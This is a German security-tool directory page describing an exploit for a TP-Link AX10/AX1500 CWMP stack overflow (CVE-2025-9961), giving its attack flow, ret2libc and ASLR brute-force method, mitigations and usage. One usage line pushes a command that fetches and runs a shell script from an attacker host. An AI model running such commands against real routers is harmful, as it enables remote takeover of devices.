Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/yt2w/cve-2025-9961
Embedded-System-SicherheitIoT-SicherheitSchwachstellenanalyseExploitationPenetrationstestsHardware-SicherheitRemote-Access-ToolBinary-Exploitation
GitHubyt2w/cve-2025-9961

CVE-2025-9961

Exploit für TP-Link AX10/AX1500 Stack-Pufferüberlauf in CWMP (TR-069), der Remote-Code-Ausführung via ret2libc mit ASLR-Umgehung ermöglicht. Enthält Check-Only-, DoS- und Befehlsausführungsmodi.

61vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

CVE-2025-9961

TP-Link AX10/AX1500 CWMP Pufferüberlauf RCE

Übersicht

Stack-basierter Pufferüberlauf in CWMP (TR-069) führt zu Remote-Code-Ausführung.

FeldWert
ProduktTP-Link AX10, AX1500
BetroffenAX10 < 1.2.1, AX1500 < 1.3.11
CVSS8.6 (Hoch)
TypStack-Pufferüberlauf
VektorCWMP/TR-069 (Port 7547)
AuswirkungRemote-Code-Ausführung

Angriffsablauf

root@kitploit:~
flowchart LR
    A[Attacker] --> B["Malicious ACS"]
    B --> C["SetParameterValues"]
    C --> D["Stack Overflow"]
    D --> E["Overwrite PC"]
    E --> F["ret2libc"]
    F --> G["system()"]
    G --> H["RCE"]

Technische Details

Die Schwachstelle liegt in der cwmp-Prozessverarbeitung von SetParameterValues SOAP-Anfragen. Die Eingabe wird zur Berechnung der Puffergröße ohne Grenzprüfung verwendet.

Ausnutzung:

  • Verwendung von ret2libc, um system() aufzurufen
  • ASLR-Umgehung durch Brute Force
  • Neustarts des Dienstes ermöglichen wiederholte Versuche

Verwendung

root@kitploit:~
python exploit.py <target_ip> --check-only

python exploit.py 192.168.0.1 --dos

python exploit.py 192.168.0.1 -c "wget http://attacker/shell.sh -O /tmp/s; sh /tmp/s"

Parameter

Anforderungen

Keine (verwendet Standardbibliothek)

Gegenmaßnahmen

  • Aktualisieren auf gefixte Firmware
  • Deaktivieren von TR-069/CWMP
  • Zugriff auf Port 7547 einschränken

Haftungsausschluss

Nur für autorisierte Sicherheitstests.

Tool herunterladen
FlaggeBeschreibungStandard
-p, --portCWMP-Port7547
-c, --commandBefehl für RCEkeine
-t, --timeoutSocket-Timeout10
--dosNur DoS-Modusaus
--check-onlyPrüfen, ob anfälligaus